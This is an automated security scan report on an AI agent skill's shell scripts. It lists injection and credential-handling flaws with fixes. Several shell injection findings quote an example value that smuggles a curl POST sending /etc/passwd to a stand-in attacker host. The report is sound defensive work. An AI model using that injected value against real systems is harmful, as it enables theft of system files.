Trust Assessment
personal-agent received a trust score of 30/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 14 findings: 0 critical, 7 high, 6 medium, and 0 low severity. Key findings include "Sensitive environment variable access: $HOME", "Shell Injection via Unquoted API Key in Curl Header", and "URL Injection via Unencoded Club Name".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (14)
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Shell Injection via Unquoted API Key in Curl Header The `API_KEY` variable is used directly within a double-quoted string in the `curl -H` command. If the `API_KEY` contains shell metacharacters (e.g., `" -X POST http://evil.com/exfil -d @/etc/passwd #`), an attacker could inject arbitrary shell commands, leading to data exfiltration or remote code execution. This vulnerability exists in multiple scripts. Ensure the `API_KEY` variable is strictly validated to contain only expected characters (e.g., alphanumeric, hyphens, underscores) or use a more robust method for passing headers that prevents shell injection, such as a dedicated HTTP client library in a higher-level language. If sticking to bash, consider using `printf %q` for complex escaping, though it's often simpler to validate input. | LLM | check.sh:20 | |
| HIGH | Shell Injection via Unquoted API Key in Curl Header The `API_KEY` variable is used directly within a double-quoted string in the `curl -H` command. If the `API_KEY` contains shell metacharacters (e.g., `" -X POST http://evil.com/exfil -d @/etc/passwd #`), an attacker could inject arbitrary shell commands, leading to data exfiltration or remote code execution. This vulnerability exists in multiple scripts. Ensure the `API_KEY` variable is strictly validated to contain only expected characters (e.g., alphanumeric, hyphens, underscores) or use a more robust method for passing headers that prevents shell injection, such as a dedicated HTTP client library in a higher-level language. If sticking to bash, consider using `printf %q` for complex escaping, though it's often simpler to validate input. | LLM | engage.sh:18 | |
| HIGH | Shell Injection via Unquoted API Key in Curl Header The `API_KEY` variable is used directly within a double-quoted string in the `curl -H` command. If the `API_KEY` contains shell metacharacters (e.g., `" -X POST http://evil.com/exfil -d @/etc/passwd #`), an attacker could inject arbitrary shell commands, leading to data exfiltration or remote code execution. This vulnerability exists in multiple scripts. Ensure the `API_KEY` variable is strictly validated to contain only expected characters (e.g., alphanumeric, hyphens, underscores) or use a more robust method for passing headers that prevents shell injection, such as a dedicated HTTP client library in a higher-level language. If sticking to bash, consider using `printf %q` for complex escaping, though it's often simpler to validate input. | LLM | post.sh:26 | |
| HIGH | JSON Injection via Unescaped Club Name in Post Data The `CLUB` variable is directly inserted into the JSON payload without proper JSON escaping. If `CLUB` is controlled by untrusted input and contains characters like `"` or `\`, an attacker could inject arbitrary JSON fields, manipulate the payload structure, or cause parsing errors, potentially leading to unintended actions or data corruption. JSON-escape the `$CLUB` variable before inserting it into the JSON payload. This can be done using `jq -Rs '.'` similar to how `MESSAGE_ESCAPED` is handled, or by using a programming language with built-in JSON serialization. | LLM | post.sh:29 | |
| HIGH | JSON Injection via Unescaped Variables in Registration Data The `BOT_NAME`, `BIO`, and `OWNER` variables are directly inserted into the JSON payload without proper JSON escaping. If these variables are controlled by untrusted input and contain characters like `"` or `\`, an attacker could inject arbitrary JSON fields, manipulate the payload structure, or cause parsing errors, potentially leading to unintended bot registration details or other vulnerabilities. JSON-escape the `$BOT_NAME`, `$BIO`, and `$OWNER` variables before inserting them into the JSON payload. This can be done using `jq -Rs '.'` or by using a programming language with built-in JSON serialization. | LLM | register.sh:13 | |
| HIGH | Shell Injection via Unquoted API Key in Curl Header The `API_KEY` variable is used directly within a double-quoted string in the `curl -H` command. If the `API_KEY` contains shell metacharacters (e.g., `" -X POST http://evil.com/exfil -d @/etc/passwd #`), an attacker could inject arbitrary shell commands, leading to data exfiltration or remote code execution. This vulnerability exists in multiple scripts. Ensure the `API_KEY` variable is strictly validated to contain only expected characters (e.g., alphanumeric, hyphens, underscores) or use a more robust method for passing headers that prevents shell injection, such as a dedicated HTTP client library in a higher-level language. If sticking to bash, consider using `printf %q` for complex escaping, though it's often simpler to validate input. | LLM | reply.sh:27 | |
| HIGH | URL Path Injection via Unencoded Post ID The `POST_ID` variable is directly inserted into the URL path without URL encoding or validation. If `POST_ID` is controlled by untrusted input and contains characters like `/`, `?`, or `#`, an attacker could manipulate the URL path, potentially targeting different API endpoints, bypassing security controls, or causing unexpected behavior. Validate `POST_ID` to ensure it only contains expected characters (e.g., alphanumeric) or URL-encode it before inserting it into the URL path. For example, use a utility like `urlencode` or a Python one-liner (`python -c 'import urllib.parse, sys; sys.stdout.write(urllib.parse.quote(sys.argv[1]))' "$POST_ID"`). | LLM | reply.sh:27 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/check.sh:8 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/engage.sh:9 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/post.sh:10 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/register.sh:41 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/reply.sh:11 | |
| MEDIUM | URL Injection via Unencoded Club Name The `CLUB` variable is directly inserted into the URL query string without URL encoding. If `CLUB` is controlled by untrusted input and contains characters like `&`, `=`, or `?`, an attacker could inject additional URL parameters or manipulate the request, potentially leading to unexpected behavior or information disclosure. URL-encode the `$CLUB` variable before inserting it into the URL. For example, use a utility like `urlencode` or a Python one-liner (`python -c 'import urllib.parse, sys; sys.stdout.write(urllib.parse.quote_plus(sys.argv[1]))' "$CLUB"`). | LLM | feed.sh:9 | |
| INFO | Credential Storage in Local File The script stores the generated `API_KEY` and other bot credentials in a local file: `$HOME/.config/claw-club/credentials.json`. While this is intended functionality for persistence, it's crucial to ensure that the file permissions are set restrictively (e.g., `chmod 600`) to prevent unauthorized access to the API key by other users or processes on the system. After creating the `credentials.json` file, explicitly set its permissions to be readable only by the owner (e.g., `chmod 600 "$CONFIG_DIR/credentials.json"`). Also, ensure the `BOT_NAME` is JSON-escaped before writing to this file to prevent JSON injection into the config file itself. | LLM | register.sh:42 | |